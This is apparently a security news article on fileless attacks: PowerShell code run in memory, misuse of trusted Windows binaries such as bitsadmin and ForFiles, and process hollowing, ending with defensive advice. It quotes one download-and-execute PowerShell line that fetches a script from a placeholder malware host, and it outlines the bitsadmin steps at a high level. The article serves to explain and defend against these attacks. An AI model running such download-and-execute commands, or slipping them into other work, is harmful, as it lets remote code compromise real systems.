Cybersecurity experts have recently observed a concerning trend in attack methodologies, with threat actors increasingly leveraging fileless techniques that weaponize PowerShell and legitimate Microsoft applications to deploy malware while evading detection.
These sophisticated attacks operate primarily in memory, leaving minimal forensic evidence and bypassing traditional security solutions that rely on file-based detection methods.
Fileless attacks, despite being around for over two decades, continue to present significant challenges to security teams.
According to recent security reports, approximately one-third of all attacks now employ fileless techniques, making them a prevalent threat in today’s cyber landscape.
The appeal for attackers lies in their ability to operate under the radar by exploiting trusted system components rather than introducing easily detectable malicious executables.
These attacks typically begin with a seemingly innocuous document containing malicious macros or a deceptive shortcut file, but quickly transition to memory-resident operations.
Rather than writing files to disk, attackers inject malicious code directly into running processes or leverage built-in Windows tools to execute their payloads, making detection exceedingly difficult for conventional security solutions.
The cybersecurity analyst, Amr Thabet noted that the PowerShell has emerged as the primary vehicle for these attacks due to its powerful scripting capabilities and deep integration with Windows systems.
Threat actors frequently use commands which downloads and executes malicious code directly in memory: iex((New-Object Net.WebClient).DownloadString(‘https://malware.com/payload.ps1’)).
This technique bypasses file-based detection since the payload never touches the disk.
The Rise of LOLBAS Techniques
Particularly concerning is the growing abuse of Living Off The Land Binaries And Scripts (LOLBAS), which involves repurposing legitimate Microsoft applications for malicious purposes.
For instance, attackers have been observed using bitsadmin.exe, a trusted Windows component, to download malware payloads when systems are idle.
LOLBAS project (Source – Medium)
The commands create jobs to retrieve malicious files and execute them through a sequence like: bitsadmin /create followed by additional commands to configure and execute the payload.
Other legitimate applications being weaponized include ForFiles.exe, which APT41 has used to maintain persistence by executing command prompt commands.
The attackers leverage these trusted binaries to blend their activities with normal system operations, making it nearly impossible for traditional security tools to distinguish between legitimate use and malicious exploitation.
Memory injection techniques further complicate detection efforts, as attackers can disguise their malware within legitimate processes like chrome.exe or svchost.exe.
Process hollowing, a technique first popularized by Stuxnet, involves executing a legitimate application in suspended mode, replacing its code with malware in memory, and then resuming execution—effectively hiding malicious activity behind a trusted process name.
Security professionals recommend implementing comprehensive endpoint detection and response solutions with memory analysis capabilities, enabling PowerShell logging and monitoring, implementing constrained language mode, and actively monitoring Active Directory for suspicious activities to defend against these sophisticated threats.
